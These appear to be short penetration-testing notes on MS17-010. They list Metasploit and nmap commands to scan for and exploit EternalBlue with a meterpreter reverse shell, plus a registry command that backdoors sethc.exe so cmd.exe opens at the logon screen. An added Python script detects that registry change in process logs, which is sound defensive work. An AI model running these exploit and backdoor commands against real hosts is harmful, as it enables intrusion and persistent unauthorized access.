MS17-010
Scanning
>use auxiliary/scanner/smb/smb_ms17_010
>set rhosts 192.168.1.0/24
&
>nmap -sT -p 445,139 --open -v -Pn --script=smb-vuln-ms17-010.nse 10.11.1.0/20
Exploitation
Note: the EternalBlue module below is prone to blue-screening (crashing) the target.
>use exploit/windows/smb/ms17_010_eternalblue
>set payload windows/x64/meterpreter/reverse_tcp
>use auxiliary/admin/smb/ms17_010_command
>set command REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f
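
Added example (not part of the original notes): the `set command` line above writes an IFEO `Debugger` value for `sethc.exe`, and this Python check flags that change in process-creation command lines such as those recorded by Sysmon Event ID 1 or Security event 4688. The sample lines are constructed, the function names are hypothetical, and the list of accessibility binaries generalises beyond the `sethc.exe` case on this page.

```python
import re

# Binaries launchable from the logon screen; sethc.exe is the page's case,
# the others generalise the same check (assumption: extend as needed).
ACCESSIBILITY_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
                          "narrator.exe", "displayswitch.exe", "atbroker.exe"}

REG_ADD = re.compile(r'\breg(?:\.exe)?"?\s+add\b', re.IGNORECASE)
IFEO_KEY = re.compile(r'image file execution options\\([^\\"\s]+\.exe)', re.IGNORECASE)
DEBUGGER_VALUE = re.compile(r'/v\s+"?debugger"?(?:\s|$)', re.IGNORECASE)
DEBUGGER_DATA = re.compile(r'/d\s+("[^"]*"|\S+)', re.IGNORECASE)


def normalise(cmdline):
    """Undo shell escaping: escaped quotes and doubled backslashes become plain."""
    return re.sub(r"\\{2,}", r"\\", cmdline.replace('\\"', '"'))


def detect_ifeo_debugger(cmdline):
    """Return (binary, debugger) when cmdline sets an IFEO Debugger value on an
    accessibility binary, else None."""
    text = normalise(cmdline)
    if not (REG_ADD.search(text) and DEBUGGER_VALUE.search(text)):
        return None
    key = IFEO_KEY.search(text)
    if not key or key.group(1).lower() not in ACCESSIBILITY_BINARIES:
        return None
    data = DEBUGGER_DATA.search(text)
    debugger = data.group(1).strip('"') if data else ""
    return key.group(1).lower(), debugger


# Constructed command lines; the first is the escaped form shown on this page.
SAMPLES = [
    r'REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f',
    r'reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v debugger /d cmd.exe /f',
    r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger',
]


def scan(cmdlines):
    """Return the (binary, debugger) hits found in an iterable of command lines."""
    return [hit for hit in map(detect_ifeo_debugger, cmdlines) if hit]


if __name__ == "__main__":
    for binary, debugger in scan(SAMPLES):
        print(f"ALERT: IFEO Debugger set on {binary} -> {debugger}")
```

The check normalises escaping before matching, so the backslash-escaped form above and the plain form typed at a console are caught by the same rule.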